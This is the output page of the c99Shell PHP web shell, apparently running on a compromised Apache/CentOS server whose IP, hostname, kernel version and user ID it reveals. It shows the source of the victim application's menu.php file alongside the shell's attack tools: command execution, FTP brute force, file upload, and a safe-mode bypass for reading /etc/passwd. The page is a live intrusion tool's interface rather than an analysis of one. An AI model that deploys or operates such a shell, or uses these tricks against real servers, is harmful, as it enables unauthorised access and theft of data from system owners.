110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/ums/ drwxr-xr-x Free 52.32 GB of 127.8 GB (40.94%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/mis2222/ums/ drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: menu.php (2.25 KB) -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php
echo "<script language=\"javascript\">\n";
echo "var myMenu =";

//include_once("global.php");
//include_once("../class/clsConnection.php");
//include_once("../class/clsDB.php");

include_once("clsUmMenu.php");
include_once("clsUmPermission.php");
include_once("clsUmGPermission.php");
$oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']);
$oUp = new umpermission($oC);
$oGp = new umgpermission($oC);
$oMmn  = new ummenu($oC);

if ($oC && $UsID <> "" && $StID <> "") {
	$StrMenu = "[ \n";
	$oMmn->RSMainMenuBySt($StID);	
	while ($oMmn->GetRecord()){
	    Showmenu($oMmn->MnID, $UsID, $GpID, 1, $StrMenu, $oC, $oUp, $oGp, $oMmn);
	}
	$StrMenu = substr($StrMenu,0,strlen($StrMenu)-1);
	$StrMenu .= "]";
	echo $StrMenu;
} else {
	$StrMenu .= "[]";
	echo $StrMenu;
}

//////////////////////////////////////////////////////////////
function ShowMenu($MnID, $UsID, $GpID, $x, &$StrMenu, &$oC, &$oUp, &$oGp, &$oMmn)
{
	//global $oC;
	//global $oUp;
	//global $oGp;	
	//global $StrMenu;
	//include_once("../class/clsDB.php");
	$oMn  = new ummenu($oC);
	$oMn->SearchByKey($MnID);
	$oMn->GetRecord();

	$flg=1;
	$oUp->SearchByKey($UsID, $MnID);

	if ($oUp->GetRecord()){
		$flg = $oUp->pmX;
	}else{
		$oGp->SearchByKey($GpID, $MnID);
		if ($oGp->GetRecord()){
			$flg = $oGp->gpX;
		}		
	}
	if($oMn->MnNameT=="-"){
		$StrMenu .= "_cmSplit,\n";
	}else{
		if ($flg==$x){
			$StrMenu .= "[";
			//--------------
			$StrMenu .= ($oMn->MnIcon=="") ? "null," : "'<img src=jscookmenu/ThemeOffice/$oMn->MnIcon>',";
			$StrMenu .= ($flg==1) ? "'$oMn->MnNameT'," : "'<font color=#999999>$oMn->MnNameT</font>',";		
			if ($oMn->MnURL=="")
				$StrMenu .= "null,"; 
			else
				$StrMenu .= ($flg==1) ? "'$oMn->MnURL?MnID=$MnID'," : "null,";
			$StrMenu .= "'_self', ";
			$StrMenu .= ($oMn->MnDesc=="") ? "null," : "'$oMn->MnDesc',";
			//---------------	
			$oMn->RSmenuByParentMn($MnID);
		}	//if flg
		while ($oMn->GetRecord()){
			ShowMenu($oMn->MnID, $UsID, $GpID, $flg, $StrMenu, $oC, $oUp, $oGp, $oMmn);
		}
		if ($flg==$x){
			$StrMenu = substr($StrMenu,0,strlen($StrMenu)-1);
			$StrMenu .= "],\n";
		}
	}	//else -
}

?>
</script>
<div id="myMenuIDH"></div>
<script language="javascript">
cmDraw ('myMenuIDH', myMenu, 'hbr', cmThemeOffice, 'ThemeOffice');
</SCRIPT>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]--